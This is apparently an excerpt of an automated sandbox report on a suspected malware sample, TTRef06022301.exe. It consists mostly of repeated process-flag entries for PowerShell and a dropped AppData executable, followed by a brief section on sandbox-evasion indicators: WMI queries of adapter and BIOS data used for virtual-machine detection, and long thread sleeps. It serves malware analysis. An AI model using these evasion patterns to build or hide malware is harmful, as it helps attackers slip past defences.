                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\TTRef06022301.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 2704Thread sleep time: -44034s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exe TID: 3304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep count: 9565 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep time: -7378697629483816s >= -30000sJump to behavior
